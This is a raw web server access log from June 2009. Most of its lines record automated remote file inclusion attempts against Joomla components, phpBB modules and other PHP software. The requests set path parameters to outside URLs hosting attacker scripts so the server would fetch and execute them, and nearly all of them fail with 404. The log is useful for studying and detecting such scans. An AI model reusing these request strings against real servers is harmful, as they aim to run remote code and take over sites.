69.94.125.100 - - [16/Jun/2009:03:48:41 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:03:48:43 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:48:54 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:49:01 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:49:16 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:49:16 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:49:16 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.98.166.76 - - [16/Jun/2009:03:49:18 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:49:19 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:49:19 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:49:19 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:03:49:38 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:03:50:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [16/Jun/2009:03:50:37 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
94.23.200.54 - - [16/Jun/2009:03:50:41 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.toyland.kz////90e06e72b16c3bd851b685c649f5391f/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
94.23.200.54 - - [16/Jun/2009:03:50:41 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.toyland.kz////90e06e72b16c3bd851b685c649f5391f/fx29id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
94.23.200.54 - - [16/Jun/2009:03:50:41 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.toyland.kz////90e06e72b16c3bd851b685c649f5391f/fx29id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:03:50:45 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:50:45 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:50:45 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:50:51 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:50:51 -0400] "GET /logs/access_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:50:51 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.826"
211.49.99.7 - - [16/Jun/2009:03:51:26 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:51:30 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:51:35 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.23.200.54 - - [16/Jun/2009:03:51:44 -0400] "GET /logs/access_log.Q109060800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.toyland.kz////90e06e72b16c3bd851b685c649f5391f/fx29id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
94.23.200.54 - - [16/Jun/2009:03:51:44 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.toyland.kz////90e06e72b16c3bd851b685c649f5391f/fx29id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:03:51:49 -0400] "GET /logs/access_log.Q108032400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
123.143.98.5 - - [16/Jun/2009:03:52:21 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:52:23 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:52:36 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:52:41 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
81.223.126.82 - - [16/Jun/2009:03:52:56 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
81.223.126.82 - - [16/Jun/2009:03:52:56 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
81.223.126.82 - - [16/Jun/2009:03:52:58 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:53:09 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:53:33 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:03:53:34 -0400] "GET /logs/access_log.Q109052900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:03:54:11 -0400] "GET /logs/error_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:03:54:14 -0400] "GET /logs/error_log.Q109060900//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt?%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.826"
81.223.126.82 - - [16/Jun/2009:03:54:37 -0400] "GET /logs/access_log.Q109050300%20%20/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.98.166.76 - - [16/Jun/2009:03:54:38 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:03:55:26 -0400] "GET /logs/error_log.Q108042200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [16/Jun/2009:03:55:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [16/Jun/2009:03:55:41 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.246.20.221 - - [16/Jun/2009:03:55:41 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.246.20.221 - - [16/Jun/2009:03:55:42 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jun/2009:03:55:45 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
174.143.3.188 - - [16/Jun/2009:03:56:53 -0400] "GET //png.php?include_path=http://www.juapage.com/ja/components/id.txt?%0D?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
174.143.3.188 - - [16/Jun/2009:03:56:53 -0400] "GET /logs//png.php?include_path=http://www.juapage.com/ja/components/id.txt?%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
174.143.3.188 - - [16/Jun/2009:03:56:53 -0400] "GET /logs/access_log.Q109053000//png.php?include_path=http://www.juapage.com/ja/components/id.txt?%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
195.56.55.217 - - [16/Jun/2009:03:56:57 -0400] "GET /logs/access_log.Q109053000//png.php?include_path=http://www.juapage.com/ja/components/id.txt?%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
195.56.55.217 - - [16/Jun/2009:03:56:57 -0400] "GET /logs//png.php?include_path=http://www.juapage.com/ja/components/id.txt?%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
195.56.55.217 - - [16/Jun/2009:03:56:57 -0400] "GET //png.php?include_path=http://www.juapage.com/ja/components/id.txt?%0D?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
66.11.230.36 - - [16/Jun/2009:03:57:07 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
174.143.3.188 - - [16/Jun/2009:03:57:16 -0400] "GET /logs/error_log.Q109053000//png.php?include_path=http://www.juapage.com/ja/components/id.txt?%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
195.56.55.217 - - [16/Jun/2009:03:57:19 -0400] "GET /logs/error_log.Q109053000//png.php?include_path=http://www.juapage.com/ja/components/id.txt?%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
211.133.240.90 - - [16/Jun/2009:03:57:52 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 252 "-" "libwww-perl/5.825"
211.133.240.90 - - [16/Jun/2009:03:57:52 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 230 "-" "libwww-perl/5.825"
211.133.240.90 - - [16/Jun/2009:03:57:52 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 225 "-" "libwww-perl/5.825"
38.99.13.118 - - [16/Jun/2009:03:58:00 -0400] "GET /images/_notes/banner_connect_over.jpg.mno HTTP/1.0" 200 255 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.133.240.90 - - [16/Jun/2009:03:58:03 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 252 "-" "libwww-perl/5.825"
121.165.73.157 - - [16/Jun/2009:03:58:56 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:03:58:56 -0400] "GET /main.php?appserv_root=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:03:58:56 -0400] "GET /logs/main.php?appserv_root=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
217.125.38.117 - - [16/Jun/2009:03:58:56 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:03:59:03 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.125.38.117 - - [16/Jun/2009:03:59:04 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.125.38.117 - - [16/Jun/2009:03:59:05 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:59:09 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:59:18 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:59:18 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.239.227.229 - - [16/Jun/2009:03:59:18 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.206.170.126 - - [16/Jun/2009:03:59:24 -0400] "GET /?sourcedir=http://bangsat1.fileave.com/id.txt?? HTTP/1.0" 200 409 "-" "Mozilla/5.0"
125.206.170.126 - - [16/Jun/2009:03:59:24 -0400] "GET /logs/?sourcedir=http://bangsat1.fileave.com/id.txt?? HTTP/1.0" 200 5706 "-" "Mozilla/5.0"
125.206.170.126 - - [16/Jun/2009:03:59:24 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://bangsat1.fileave.com/id.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
125.206.170.126 - - [16/Jun/2009:03:59:24 -0400] "GET /logs/access_log.Q109060400%20%20/?sourcedir=http://bangsat1.fileave.com/id.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [16/Jun/2009:03:59:25 -0400] "GET /logs/access_log.Q109052600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:59:27 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:59:27 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:03:59:27 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:03:59:35 -0400] "GET /logs/access_log.Q109052300//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:03:59:35 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:03:59:35 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:04:00:23 -0400] "GET /logs/error_log.Q108091700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.223.126.82 - - [16/Jun/2009:04:00:25 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.6.17.151 - - [16/Jun/2009:04:01:01 -0400] "GET /logs/error_log.Q108092000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.99.44.103 - - [16/Jun/2009:04:01:25 -0400] "GET /logs/access_log.Q107120900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.105.207.244 - - [16/Jun/2009:04:01:37 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:04:01:37 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:04:01:37 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:04:02:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.37.176.35 - - [16/Jun/2009:04:02:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
88.37.176.35 - - [16/Jun/2009:04:02:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
81.223.126.82 - - [16/Jun/2009:04:03:15 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.6.17.151 - - [16/Jun/2009:04:03:54 -0400] "GET /logs/access_log.Q109051500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.98.209.71 - - [16/Jun/2009:04:03:54 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:04:03:54 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:04:03:54 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:04:04:41 -0400] "GET /logs/access_log.Q107080400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [16/Jun/2009:04:04:54 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:04:04:54 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:04:04:55 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:04:05:00 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:04:05:00 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:04:05:00 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:04:05:00 -0400] "GET /logs/access_log.Q109051000%20%20//oneadmin/photogallery/include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.23.158.226 - - [16/Jun/2009:04:05:07 -0400] "GET /logs/access_log.Q108112300/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.158.226 - - [16/Jun/2009:04:05:07 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.158.226 - - [16/Jun/2009:04:05:07 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
66.249.71.54 - - [16/Jun/2009:04:05:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0048644B1C92E100366E04S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.23.158.226 - - [16/Jun/2009:04:05:21 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
